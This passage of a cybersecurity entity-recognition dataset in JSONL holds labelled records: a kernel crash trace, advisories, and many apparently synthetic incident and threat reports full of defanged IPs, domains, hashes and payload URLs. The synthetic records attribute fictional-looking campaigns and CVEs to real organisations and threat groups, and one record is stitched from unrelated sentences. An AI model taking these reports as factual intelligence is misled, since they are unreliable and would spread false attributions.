ext4_xattr_inode_dec_ref_all+0xb8c/0xe90\nRead of size 4 at addr ffff888012c120c4 by task repro/2065\n\nCPU: 1 UID: 0 PID: 2065 Comm: repro Not tainted 6.13.0-rc2+ #11\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1[.]16[.]3-0-ga6ed6b701f0a-prebuilt[.]qemu[.]org 04/01/2014\nCall Trace:\n \n dump_stack_lvl+0x1fd/0x300\n ? tcp_gro_dev_warn+0x260/0x260\n ? _printk+0xc0/0x100\n ? read_lock_is_recursive+0x10/0x10\n ? irq_work_queue+0x72/0xf0\n ? __virt_addr_valid+0x17b/0x4b0\n print_address_description+0x78/0x390\n print_report+0x107/0x1f0\n ? __virt_addr_valid+0x17b/0x4b0\n ? __virt_addr_valid+0x3ff/0x4b0\n ? __phys_addr+0xb5/0x160\n ? ext4_xattr_inode_dec_ref_all+0xb8c/0xe90\n kasan_report+0xcc/0x100\n ? ext4_xattr_inode_dec_ref_all+0xb8c/0xe90\n ext4_xattr_inode_dec_ref_all+0xb8c/0xe90\n ? ext4_xattr_delete_inode+0xd30/0xd30\n ? __ext4_journal_ensure_credits+0x5f0/0x5f0\n ? __ext4_journal_ensure_credits+0x2b/0x5f0\n ? 
inode_update_timestamps+0x410/0x410\n ext4_xattr_delete_inode+0xb64/0xd30\n ? ext4_truncate+0xb70/0xdc0\n ? ext4_expand_extra_isize_ea+0x1d20/0x1d20\n ? __ext4_mark_inode_dirty+0x670/0x670\n ? ext4_journal_check_start+0x16f/0x240\n ? ext4_inode_is_fast_symlink+0x2f2/0x3a0\n ext4_evict_inode+0xc8c/0xff0\n ? ext4_inode_is_fast_symlink+0x3a0/0x3a0\n ? do_raw_spin_unlock+0x53/0x8a0\n ? ext4_inode_is_fast_symlink+0x3a0/0x3a0\n evict+0x4ac/0x950\n ? proc_nr_inodes+0x310/0x310\n ? trace_ext4_drop_inode+0xa2/0x220\n ? _raw_spin_unlock+0x1a/0x30\n ? iput+0x4cb/0x7e0\n do_unlinkat+0x495/0x7c0\n ? try_break_deleg+0x120/0x120\n ? 0xffffffff81000000\n ? __check_object_size+0x15a/0x210\n ? strncpy_from_user+0x13e/0x250\n ? getname_flags+0x1dc/0x530\n __x64_sys_unlinkat+0xc8/0xf0\n do_syscall_64+0x65/0x110\n entry_SYSCALL_64_after_hwframe+0x67/0x6f\nRIP: 0033:0x434ffd\nCode: 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 8\nRSP: 002b:00007ffc50fa7b28 EFLAGS: 00000246 ORIG_RAX: 0000000000000107\nRAX: ffffffffffffffda RBX: 00007ffc50fa7e18 RCX: 0000000000434ffd\nRDX: 0000000000000000 RSI: 0000000020000240 RDI: 0000000000000005\nRBP: 00007ffc50fa7be0 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000001\nR13: 00007ffc50fa7e08 R14: 00000000004bbf30 R15: 0000000000000001\n \n\nThe buggy address belongs to the object at ffff888012c12000\n which belongs to the cache filp of size 360\nThe buggy address is located 196 bytes inside of\n freed 360-byte region [ffff888012c12000, ffff888012c12168)\n\nThe buggy address belongs to the physical page:\npage: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x12c12\nhead: order:1 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0\nflags: 0x40(head|node=0|zone=0)\npage_type: f5(slab)\nraw: 0000000000000040 ffff888000ad7640 ffffea0000497a00 dead000000000004\nraw: 0000000000000000 0000000000100010 00000001f5000000 
0000000000000000\nhead: 0000000000000040 ffff888000ad7640 ffffea0000497a00 dead000000000004\nhead: 0000000000000000 0000000000100010 00000001f5000000 0000000000000000\nhead: 0000000000000001 ffffea00004b0481 ffffffffffffffff 0000000000000000\nhead: 0000000000000002 0000000000000000 00000000ffffffff 0000000000000000\npage dumped because: kasan: bad access detected\n\nMemory state around the buggy address:\n ffff888012c11f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n ffff888012c12000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n> ffff888012c12080: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n ^\n ffff888012c12100: fb fb fb fb fb fb fb fb fb fb fb fb fb fc fc fc\n ffff888012c12180: fc fc fc fc fc fc fc fc fc\n---truncated---", "spans": {"Indicator: rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org": [[569, 621]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[527, 531]], "Vulnerability: use-after-free": [[329, 343]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-37738"}} {"text": "A backdoor also known as: W32.Otwyacal.C Win32.Trojan.WisdomEyes.16070401.9500.9748 W32.Wapomi.C!inf Win.Trojan.Vjadtre-6170948-0 Win32.HLLP.Protil.1 BehavesLike[.]Win32[.]Virut[.]ch W32/Jadtre.C Trojan.Symmi.D4E83 Trj/CI.A Win32/Wapomi.Z Virus.Win32.Wapomi.a Exploit.Win32.ShellCode", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Virut.ch": [[150, 182]]}, "info": {"id": "cyner2_train_001038", "source": "defanged_augment"}} {"text": "TG-3390 : 72[.]11[.]148[.]220 .", "spans": {"Indicator: 72.11.148.220": [[10, 29]]}, "info": {"id": "cyberner_stix_train_004139", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 172 [ . ] 228 [ . ] 198 [ . ] 122, the NSA IR team identified Ryuk running as /opt/app/bin/sam.hive. The threat actor, believed to be Flax Typhoon, used Chisel for credential harvesting and LaZagne for lateral movement. 
Exfiltrated data was sent to mailstatic[.]org and gatewayapi[ . ]com. The initial dropper (MD5: 66a4581044f74a34d62f4f5c1344b399) was delivered via a phishing email from account@secure-verify[ . ]net. A second C2 node was observed at 145 [ . ] 216 [ . ] 46 [ . ] 194, with a persistence mechanism writing to /var/tmp/payload.bin.", "spans": {"Indicator: 172.228.198.122": [[64, 97]], "Organization: NSA": [[103, 106]], "Malware: Ryuk": [[126, 130]], "Indicator: mailstatic.org": [[313, 329]], "Indicator: gatewayapi.com": [[334, 352]], "Indicator: 66a4581044f74a34d62f4f5c1344b399": [[380, 412]], "Indicator: account@secure-verify.net": [[454, 483]], "Indicator: 145.216.46.194": [[518, 550]]}, "info": {"id": "synth_v2_00270", "source": "defanged_augment"}} {"text": "Artifact Analysis for ShadowPad campaign:\nStage 1 dropper at C:\\Windows\\Tasks\\taskhost.exe - SHA1: 404c11c8a5513c340c0d3fef74a40d1c4eac14ba\nStage 2 loader at /etc/cron.d/runtime.dll - SHA256: 108b8d2d16aa2245253d3c10543774ce38c370589fbc3818a6137cf7d162b825\nFinal payload at /usr/local/bin/config.dat - SHA256: 0ddf3dd5691f6ba2b36bedd64dac60ba8b4c2003c852bf9c4b3dcda648c0bbd3\nExfiltration module - SHA1: 4575a8e18191b195177ee4042949494b43d4a7c8\nAll stages communicated with 192[.]89[.]237[.]198. 
LaZagne signatures detected in Stage 2.", "spans": {"Malware: ShadowPad": [[22, 31]], "Indicator: 404c11c8a5513c340c0d3fef74a40d1c4eac14ba": [[99, 139]], "Indicator: 108b8d2d16aa2245253d3c10543774ce38c370589fbc3818a6137cf7d162b825": [[192, 256]], "Indicator: 0ddf3dd5691f6ba2b36bedd64dac60ba8b4c2003c852bf9c4b3dcda648c0bbd3": [[310, 374]], "Indicator: 4575a8e18191b195177ee4042949494b43d4a7c8": [[403, 443]], "Indicator: 192.89.237.198": [[473, 493]]}, "info": {"id": "synth_v2_01977", "source": "defanged_augment"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 BehavesLike[.]Win32[.]Multiplug[.]ch Trojan:Win32/Autophyte.A!dha Backdoor/Win32.Akdoor.R198284", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Multiplug.ch": [[69, 105]]}, "info": {"id": "cyner2_train_000534", "source": "defanged_augment"}} {"text": "This flaw allows an attacker to insert cookies at will into a running program\nusing libcurl, if the specific series of conditions are met.\n\nlibcurl performs transfers. In its API, an application creates \"easy handles\"\nthat are the individual handles for single transfers.\n\nlibcurl provides a function call that duplicates en easy handle called\n[curl_easy_duphandle](hxxps://curl[.]se/libcurl/c/curl_easy_duphandle.html).\n\nIf a transfer has cookies enabled when the handle is duplicated, the\ncookie-enable state is also cloned - but without cloning the actual\ncookies. If the source handle did not read any cookies from a specific file on\ndisk, the cloned version of the handle would instead store the file name as\n`none` (using the four ASCII letters, no quotes).\n\nSubsequent use of the cloned handle that does not explicitly set a source to\nload cookies from would then inadvertently load cookies from a file named\n`none` - if such a file exists and is readable in the current directory of the\nprogram using libcurl. 
And if using the correct file format of course.", "spans": {"Indicator: https://curl.se/libcurl/c/curl_easy_duphandle.html": [[366, 418]], "System: libcurl": [[84, 91], [140, 147], [273, 280], [1009, 1016]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-38546"}} {"text": "Zscaler ThreatLabz published a threat intelligence report linking Ember Bear to a new campaign exploiting CVE-2021-10425 in F5 BIG-IP. The attackers deployed Vidar via Sliver, establishing C2 communication with 19 [ . ] 41 [ . ] 164 [ . ] 156 and portalstatic[ . ]io. A secondary payload was downloaded from hxxp://relaynode[.]cc/api/v2/auth. The malware binary (SHA1: a3c2a25cd751695ce81b16d01f567cc42b44e656) was dropped to C:\\Users\\Public\\Documents\\dropper.ps1. Phishing emails were sent from billing@identity-verify[ . ]cc targeting enterprise users. A backup C2 server was identified at 10 [ . ] 64 [ . ] 140 [ . ] 160.", "spans": {"Organization: Zscaler ThreatLabz": [[0, 18]], "Vulnerability: CVE-2021-10425": [[106, 120]], "System: F5 BIG-IP": [[124, 133]], "Malware: Vidar": [[158, 163]], "Indicator: 19.41.164.156": [[211, 242]], "Indicator: portalstatic.io": [[247, 266]], "Indicator: http://relaynode.cc/api/v2/auth": [[308, 341]], "Indicator: a3c2a25cd751695ce81b16d01f567cc42b44e656": [[369, 409]], "Indicator: billing@identity-verify.cc": [[496, 526]], "Indicator: 10.64.140.160": [[592, 623]]}, "info": {"id": "synth_v2_00039", "source": "defanged_augment"}} {"text": "Electronicfrontierfoundation[ . ]org was not the only domain involved in this attack.", "spans": {"Indicator: Electronicfrontierfoundation.org": [[0, 36]]}, "info": {"id": "cyner2_train_005164", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Havoc artifacts at C:\\Windows\\System32\\loader.exe. Memory dump analysis confirmed execution of Hashcat. Registry modifications pointed to persistence via /etc/cron.d/ntds.dit. 
Network forensics identified connections to 10 [ . ] 43 [ . ] 182 [ . ] 249 and proxy-relay[ . ]tech. Email headers traced the initial vector to confirm@account-update[ . ]xyz. File C:\\Windows\\Tasks\\payload.bin (SHA1: cfc8d12241a5d24a9b2c8808ba471120108cc75a) was identified as the initial dropper. A staging URL hxxp://secure-portal[ . ]org/portal/verify resolved to 185 [ . ] 111 [ . ] 125 [ . ] 221. Secondary artifact hash: MD5: af0b6abbf3b0dc5964b3536a85a2bfe6.", "spans": {"Indicator: 10.43.182.249": [[292, 323]], "Indicator: proxy-relay.tech": [[328, 348]], "Indicator: confirm@account-update.xyz": [[393, 423]], "Indicator: cfc8d12241a5d24a9b2c8808ba471120108cc75a": [[466, 506]], "Indicator: http://secure-portal.org/portal/verify": [[561, 603]], "Indicator: 185.111.125.221": [[616, 649]], "Indicator: af0b6abbf3b0dc5964b3536a85a2bfe6": [[681, 713]]}, "info": {"id": "synth_v2_01172", "source": "defanged_augment"}} {"text": "Blog Post by Europol: Tracking Gamaredon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2023-16619 against Juniper SRX deployments. The initial access vector involves spear-phishing emails from admin@credential-check[.]site delivering AgentTesla. Post-compromise, the attackers deploy QakBot and use Burp Suite for reconnaissance. C2 infrastructure includes 75[.]51[.]203[.]70 and cdnnode[ . ]site. A staging server at hxxp://cache-storage[ . ]xyz/download/update.exe hosts additional tooling. 
Key artifact: C:\\Windows\\System32\\backdoor.elf (SHA256: ca75918ba9553a2d2b86a1b6adcf61e66715933cff2a596a896dfa3d404837ab).", "spans": {"Organization: Europol": [[13, 20]], "Vulnerability: CVE-2023-16619": [[120, 134]], "System: Juniper SRX": [[143, 154]], "Indicator: admin@credential-check.site": [[230, 259]], "Malware: AgentTesla": [[271, 281]], "Malware: QakBot": [[321, 327]], "Indicator: 75.51.203.70": [[394, 412]], "Indicator: cdnnode.site": [[417, 433]], "Indicator: hxxp://cache-storage.xyz/download/update.exe": [[455, 503]], "Indicator: ca75918ba9553a2d2b86a1b6adcf61e66715933cff2a596a896dfa3d404837ab": [[586, 650]]}, "info": {"id": "synth_v2_01510", "source": "defanged_augment"}} {"text": "Artifact Analysis for BatLoader campaign:\nStage 1 dropper at C:\\ProgramData\\agent.py - SHA1: f8989b56cc480be9ae80b2fa721e3be19fc95aa4\nStage 2 loader at /opt/app/bin/config.dat - MD5: 53eecbd9df190056a69c90861f6f1112\nFinal payload at /opt/app/bin/payload.bin - MD5: ccb0dd1d4b6b2bf6c52e923b70514a4f\nExfiltration module - MD5: 0eeffd30add4ff0ce1eba5ce0ce31a3e\nAll stages communicated with 77 [ . ] 194 [ . ] 162 [ . ] 222. Seatbelt signatures detected in Stage 2.", "spans": {"Malware: BatLoader": [[22, 31]], "Indicator: f8989b56cc480be9ae80b2fa721e3be19fc95aa4": [[93, 133]], "Indicator: 53eecbd9df190056a69c90861f6f1112": [[183, 215]], "Indicator: ccb0dd1d4b6b2bf6c52e923b70514a4f": [[265, 297]], "Indicator: 0eeffd30add4ff0ce1eba5ce0ce31a3e": [[325, 357]], "Indicator: 77.194.162.222": [[387, 419]]}, "info": {"id": "synth_v2_01927", "source": "defanged_augment"}} {"text": "NSA published a threat intelligence report linking Mustang Panda to a new campaign exploiting CVE-2025-13087 in Windows Server 2019. The attackers deployed Lumma Stealer via PsExec, establishing C2 communication with 192 [ . ] 175 [ . ] 61 [ . ] 253 and portal-api[ . ]club. A secondary payload was downloaded from hxxps://auth-storage[ . ]tech/download/update.exe. 
The malware binary (MD5: c35be3fdba9bf683edaf783fa12b9c89) was dropped to C:\\Windows\\System32\\payload.bin. Phishing emails were sent from info@urgent-notice[.]online targeting enterprise users. A backup C2 server was identified at 178[.]67[.]244[.]19.", "spans": {"Organization: NSA": [[0, 3]], "Vulnerability: CVE-2025-13087": [[94, 108]], "System: Windows Server 2019": [[112, 131]], "Malware: Lumma Stealer": [[156, 169]], "Indicator: 192.175.61.253": [[217, 249]], "Indicator: portal-api.club": [[254, 273]], "Indicator: https://auth-storage.tech/download/update.exe": [[315, 364]], "Indicator: c35be3fdba9bf683edaf783fa12b9c89": [[391, 423]], "Indicator: info@urgent-notice.online": [[504, 531]], "Indicator: 178.67.244.19": [[597, 616]]}, "info": {"id": "synth_v2_00101", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Sharphound artifacts at C:\\Windows\\System32\\config.dat. Memory dump analysis confirmed execution of GhostPack. Registry modifications pointed to persistence via C:\\Users\\admin\\Downloads\\backdoor.elf. Network forensics identified connections to 10 [ . ] 210 [ . ] 125 [ . ] 48 and auth-edge[.]net. Email headers traced the initial vector to finance@mail-service[.]info. File C:\\Users\\Public\\Documents\\implant.so (SHA1: 212effc3dae43cd0de555adde2786da7c8973dfb) was identified as the initial dropper. A staging URL hxxps://securebackup[ . ]link/download/update.exe resolved to 172[.]160[.]157[.]231. 
Secondary artifact hash: SHA1: 4eb75ba1d6dbed442affdb929b07e49d88a8f53f.", "spans": {"Indicator: 10.210.125.48": [[316, 347]], "Indicator: auth-edge.net": [[352, 367]], "Indicator: finance@mail-service.info": [[412, 439]], "Indicator: 212effc3dae43cd0de555adde2786da7c8973dfb": [[490, 530]], "Indicator: https://securebackup.link/download/update.exe": [[585, 634]], "Indicator: 172.160.157.231": [[647, 668]], "Indicator: 4eb75ba1d6dbed442affdb929b07e49d88a8f53f": [[701, 741]]}, "info": {"id": "synth_v2_01134", "source": "defanged_augment"}} {"text": "After investigation , QiAnXin suspect this attack is carried out by Molerats . It contains a Word document in plaintext ( written to Bienvenue_a_Sahaja_Yoga_Toulouse[ . ]doc ) , along with an executable ( Update[.]exe ) and DLL ( McUpdate[.]dll ) .", "spans": {"Organization: QiAnXin": [[22, 29]], "Indicator: Bienvenue_a_Sahaja_Yoga_Toulouse.doc": [[133, 173]], "Indicator: Update.exe": [[205, 217]], "Indicator: McUpdate.dll": [[230, 244]]}, "info": {"id": "cyberner_stix_train_001242", "source": "defanged_augment"}} {"text": "The C2 server will then provide a secondary payload to the beacon in ASCII hexadecimal representation , which the Trojan will decode and write to the following location : %APPDATA%\\Roaming\\Audio\\soundfix[ . ]exe .", "spans": {"Malware: Trojan": [[114, 120]], "Indicator: %APPDATA%\\Roaming\\Audio\\soundfix.exe": [[171, 211]]}, "info": {"id": "cyberner_stix_train_001787", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 81[.]42[.]56[.]41, the SentinelOne IR team identified BlackCat running as /opt/app/bin/agent.py. The threat actor, believed to be APT28, used Ligolo for credential harvesting and SharpHound for lateral movement. Exfiltrated data was sent to relayproxy[ . ]live and sync-secure[.]top. The initial dropper (MD5: ccf6264f30606e6fb640fdc1d6102059) was delivered via a phishing email from security@identity-verify[.]cc. 
A second C2 node was observed at 192[.]66[.]210[.]203, with a persistence mechanism writing to /tmp/chrome_helper.exe.", "spans": {"Indicator: 81.42.56.41": [[64, 81]], "Organization: SentinelOne": [[87, 98]], "Malware: BlackCat": [[118, 126]], "Indicator: relayproxy.live": [[305, 324]], "Indicator: sync-secure.top": [[329, 346]], "Indicator: ccf6264f30606e6fb640fdc1d6102059": [[374, 406]], "Indicator: security@identity-verify.cc": [[448, 477]], "Indicator: 192.66.210.203": [[512, 532]]}, "info": {"id": "synth_v2_00261", "source": "defanged_augment"}} {"text": "CVE-2026-23778: Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7 [ . ] 7 [ . ] 1 [ . ] 0 through 8.5, LTS2025 release version 8 [ . ] 3 [ . ] 1 [ . ] 0 through 8[.]3[.]1[.]20, LTS2024 release versions 7[.]13[.]1[.]0 through 7 [ . ] 13 [ . ] 1 [ . ] 50, contain a command injection vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability to gain root-level access.", "spans": {"Vulnerability: CVE-2026-23778": [[0, 14]], "Vulnerability: command injection": [[316, 333]], "Indicator: 7.7.1.0": [[116, 141]], "Indicator: 8.3.1.0": [[179, 204]], "Indicator: 8.3.1.20": [[213, 227]], "Indicator: 7.13.1.0": [[254, 268]], "Indicator: 7.13.1.50": [[277, 304]]}, "info": {"id": "nvd_2026_23778", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Nmap artifacts at C:\\Users\\admin\\Downloads\\helper.sh. Memory dump analysis confirmed execution of BloodHound. Registry modifications pointed to persistence via /var/tmp/svchost.exe. Network forensics identified connections to 109 [ . ] 146 [ . ] 8 [ . ] 81 and securelogin[.]net. Email headers traced the initial vector to it@secure-verify[.]net. File C:\\Users\\admin\\Downloads\\shell.php (SHA1: 780a2f6055fd5b3ada318fb8cee450d1d9f50478) was identified as the initial dropper. A staging URL hxxp://api-edge[ . 
]site/login resolved to 215 [ . ] 246 [ . ] 123 [ . ] 160. Secondary artifact hash: SHA256: df4e312cc92286b5477c912ee22ce7c27bf8a195ada2efe8af521773da1bc578.", "spans": {"Indicator: 109.146.8.81": [[298, 328]], "Indicator: securelogin.net": [[333, 350]], "Indicator: it@secure-verify.net": [[395, 417]], "Indicator: 780a2f6055fd5b3ada318fb8cee450d1d9f50478": [[466, 506]], "Indicator: http://api-edge.site/login": [[561, 591]], "Indicator: 215.246.123.160": [[604, 637]], "Indicator: df4e312cc92286b5477c912ee22ce7c27bf8a195ada2efe8af521773da1bc578": [[672, 736]]}, "info": {"id": "synth_v2_01152", "source": "defanged_augment"}} {"text": "Blog Post by CrowdStrike: Tracking Silk Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2026-46256 against Cisco ASA deployments. The initial access vector involves spear-phishing emails from account@secure-verify[.]net delivering Conti. Post-compromise, the attackers deploy Dridex and use Merlin for reconnaissance. C2 infrastructure includes 172 [ . ] 14 [ . ] 198 [ . ] 27 and cdn-auth[.]net. A staging server at hxxp://relay-cloud[.]io/api/v2/auth hosts additional tooling. Key artifact: C:\\Windows\\Tasks\\config.dat (SHA1: 72d9accf70316f50e473b0cf5e8b14b57ab6c44b).", "spans": {"Organization: CrowdStrike": [[13, 24]], "Vulnerability: CVE-2026-46256": [[127, 141]], "System: Cisco ASA": [[150, 159]], "Indicator: account@secure-verify.net": [[235, 262]], "Malware: Conti": [[274, 279]], "Malware: Dridex": [[319, 325]], "Indicator: 172.14.198.27": [[388, 419]], "Indicator: cdn-auth.net": [[424, 438]], "Indicator: hxxp://relay-cloud.io/api/v2/auth": [[460, 495]], "Indicator: 72d9accf70316f50e473b0cf5e8b14b57ab6c44b": [[571, 611]]}, "info": {"id": "synth_v2_01584", "source": "defanged_augment"}} {"text": "Starting in October 2016 , NewsBeef compromised a set of legitimate servers (shown below) , and injected JavaScript to redirect visitors to hxxp://analytics-google[ . 
]org:69/Check.aspx .", "spans": {"Indicator: http://analytics-google.org:69/Check.aspx": [[140, 185]]}, "info": {"id": "dnrti_train_002882", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Secureworks identified a large-scale phishing operation. Emails originated from finance@credential-check[ . ]site and verify@account-update[.]xyz, spoofing legitimate services. Victims were directed to hxxp://updateedge[ . ]info/wp-content/uploads/doc.php which hosted a credential harvesting page on cdn-sync[.]net. A secondary link hxxps://sync-secure[ . ]xyz/panel/index.html delivered ShadowPad (SHA256: ee189d531cf1659610508af2b64eaca170c0d433c61be9309b43eecd3aa66773). The malware was saved to /home/user/.config/taskhost.exe and established C2 with 88[.]126[.]203[.]154.", "spans": {"Organization: Secureworks": [[26, 37]], "Indicator: finance@credential-check.site": [[106, 139]], "Indicator: verify@account-update.xyz": [[144, 171]], "Indicator: hxxp://updateedge.info/wp-content/uploads/doc.php": [[228, 281]], "Indicator: cdn-sync.net": [[327, 341]], "Indicator: https://sync-secure.xyz/panel/index.html": [[360, 404]], "Malware: ShadowPad": [[415, 424]], "Indicator: ee189d531cf1659610508af2b64eaca170c0d433c61be9309b43eecd3aa66773": [[434, 498]], "Indicator: 88.126.203.154": [[582, 602]]}, "info": {"id": "synth_v2_01065", "source": "defanged_augment"}} {"text": "Ongoing activity While monitoring this particular threat , we found another XLoader variant posing as a pornography app aimed at South Korean users . Despite the differing sponsorship , penetration of Hong Kong and Taiwan-based media organizations continues to be a priority for China-based APT16 . Note the request number parameter is now 0001: 39e965e000caD60001679C79T[ . ]sample-domain[ . ]evil . 
The ransomware is a 64bit executable written in Rust and it recognises the following commandline parameters", "spans": {"Malware: XLoader": [[76, 83]], "Organization: media organizations": [[228, 247]], "Indicator: 39e965e000caD60001679C79T.sample-domain.evil": [[346, 398]], "Malware: ransomware": [[405, 415]], "Malware: 64bit executable": [[421, 437]]}, "info": {"id": "cyberner_stix_train_003486", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 134[.]165[.]190[.]145, the Tenable IR team identified Gootloader running as /opt/app/bin/payload.bin. The threat actor, believed to be Aqua Blizzard, used Merlin for credential harvesting and Mythic for lateral movement. Exfiltrated data was sent to nodestatic[.]info and relaycloud[ . ]dev. The initial dropper (SHA1: 222742d9e290ccde12fc5c6ee3ccf51ba2c27269) was delivered via a phishing email from verify@phishing-domain[ . ]com. A second C2 node was observed at 10 [ . ] 148 [ . ] 104 [ . ] 206, with a persistence mechanism writing to C:\\Users\\admin\\Downloads\\loader.exe.", "spans": {"Indicator: 134.165.190.145": [[64, 85]], "Organization: Tenable": [[91, 98]], "Malware: Gootloader": [[118, 128]], "Indicator: nodestatic.info": [[314, 331]], "Indicator: relaycloud.dev": [[336, 354]], "Indicator: 222742d9e290ccde12fc5c6ee3ccf51ba2c27269": [[383, 423]], "Indicator: verify@phishing-domain.com": [[465, 495]], "Indicator: 10.148.104.206": [[530, 562]]}, "info": {"id": "synth_v2_00441", "source": "defanged_augment"}} {"text": "This would explain the number of victims – there are less than 10 of them and according to our detection statistics , they are all located in the Russia . The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control ( C2 ) server to a victim 's system via dual proxies . At 23:29 , the attackers then proceeded to deploy an updated version of their POSHC2 stager . 192 [ . ] 119 [ . ] 15 [ . 
] 35 880 hxxp://mynetwork[.]ddns[.]net:880/st-36-p4578.ps1 . The group 's long - standing center focus has been Ukraine , where it has carried out a campaign of disruptive and destructive attacks over the past decade using wiper malware , including during Russia 's re - invasion in 2022 .", "spans": {"Malware: POSHC2": [[402, 408]], "Indicator: 192.119.15.35 880": [[418, 453]], "Indicator: http://mynetwork.ddns.net:880/st-36-p4578.ps1": [[454, 503]], "Organization: Ukraine": [[557, 564]], "Malware: wiper malware": [[668, 681]]}, "info": {"id": "cyberner_stix_train_003078", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2021-32059 is a critical SSRF vulnerability affecting Ubuntu 22.04. Proofpoint confirmed active exploitation by BlackTech in the wild. Exploitation delivers Emotet (SHA256: 042fb290fe9035bf2a412109049ee3591bf6f44d89657d81b364a8cf376c0d45) which is dropped to C:\\Users\\admin\\Downloads\\sam.hive. The exploit payload is hosted at hxxps://edgecdn[.]net/collect and communicates to 2[.]246[.]33[.]16 for C2.", "spans": {"Vulnerability: CVE-2021-32059": [[24, 38]], "Vulnerability: SSRF vulnerability": [[53, 71]], "System: Ubuntu 22.04": [[82, 94]], "Organization: Proofpoint": [[96, 106]], "Malware: Emotet": [[185, 191]], "Indicator: 042fb290fe9035bf2a412109049ee3591bf6f44d89657d81b364a8cf376c0d45": [[201, 265]], "Indicator: hxxps://edgecdn.net/collect": [[355, 384]], "Indicator: 2.246.33.16": [[405, 422]]}, "info": {"id": "synth_v2_00783", "source": "defanged_augment"}} {"text": "Blog Post by Rapid7: Tracking Scattered Spider's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2022-13003 against F5 BIG-IP deployments. The initial access vector involves spear-phishing emails from security@phishing-domain[ . ]com delivering BlackCat. Post-compromise, the attackers deploy RedLine Stealer and use Ligolo for reconnaissance. C2 infrastructure includes 69[.]137[.]182[.]87 and proxyportal[ . ]live. 
A staging server at hxxps://clouddata[.]live/assets/js/payload.js hosts additional tooling. Key artifact: /opt/app/bin/svchost.exe (MD5: b6727a0c5c74e576c9a925426bc83fd8).", "spans": {"Organization: Rapid7": [[13, 19]], "Vulnerability: CVE-2022-13003": [[126, 140]], "System: F5 BIG-IP": [[149, 158]], "Indicator: security@phishing-domain.com": [[234, 266]], "Malware: BlackCat": [[278, 286]], "Malware: RedLine Stealer": [[326, 341]], "Indicator: 69.137.182.87": [[404, 423]], "Indicator: proxyportal.live": [[428, 448]], "Indicator: https://clouddata.live/assets/js/payload.js": [[470, 515]], "Indicator: b6727a0c5c74e576c9a925426bc83fd8": [[587, 619]]}, "info": {"id": "synth_v2_01619", "source": "defanged_augment"}} {"text": "Google TAG detected a multi-stage attack chain. The initial phishing email from account@login-portal[ . ]tech contained a link to hxxps://dataedge[.]info/panel/index.html. This redirected to hxxp://storageproxy[ . ]dev/api/v2/auth on updateproxy[.]cc. A secondary email from billing@credential-check[.]site pointed to hxxp://portalmail[.]top/download/update.exe which delivered DanaBot. The final payload callback was hxxp://sync-mail[ . ]live/callback resolving to 172 [ . ] 57 [ . ] 180 [ . 
] 214 via data-backup[.]com.", "spans": {"Organization: Google TAG": [[0, 10]], "Indicator: account@login-portal.tech": [[80, 109]], "Indicator: hxxps://dataedge.info/panel/index.html": [[130, 170]], "Indicator: http://storageproxy.dev/api/v2/auth": [[191, 230]], "Indicator: updateproxy.cc": [[234, 250]], "Indicator: billing@credential-check.site": [[275, 306]], "Indicator: http://portalmail.top/download/update.exe": [[318, 361]], "Malware: DanaBot": [[378, 385]], "Indicator: hxxp://sync-mail.live/callback": [[418, 452]], "Indicator: 172.57.180.214": [[466, 498]], "Indicator: data-backup.com": [[503, 520]]}, "info": {"id": "synth_v2_01844", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 152[.]65[.]132[.]3, the NSA IR team identified StealC running as C:\\Windows\\Tasks\\config.dat. The threat actor, believed to be Silk Typhoon, used Havoc for credential harvesting and Ligolo for lateral movement. Exfiltrated data was sent to cdnmail[ . ]club and static-gateway[ . ]club. The initial dropper (MD5: ef65f23e3e18566f546f1b71a2731010) was delivered via a phishing email from finance@mail-service[ . ]info. A second C2 node was observed at 192[.]64[.]73[.]97, with a persistence mechanism writing to C:\\Windows\\Tasks\\csrss.exe.", "spans": {"Indicator: 152.65.132.3": [[64, 82]], "Organization: NSA": [[88, 91]], "Malware: StealC": [[111, 117]], "Indicator: cdnmail.club": [[304, 320]], "Indicator: static-gateway.club": [[325, 348]], "Indicator: ef65f23e3e18566f546f1b71a2731010": [[376, 408]], "Indicator: finance@mail-service.info": [[450, 479]], "Indicator: 192.64.73.97": [[514, 532]]}, "info": {"id": "synth_v2_00343", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: NCSC identified a large-scale phishing operation. Emails originated from service@auth-check[.]org and account@document-share[ . ]link, spoofing legitimate services. 
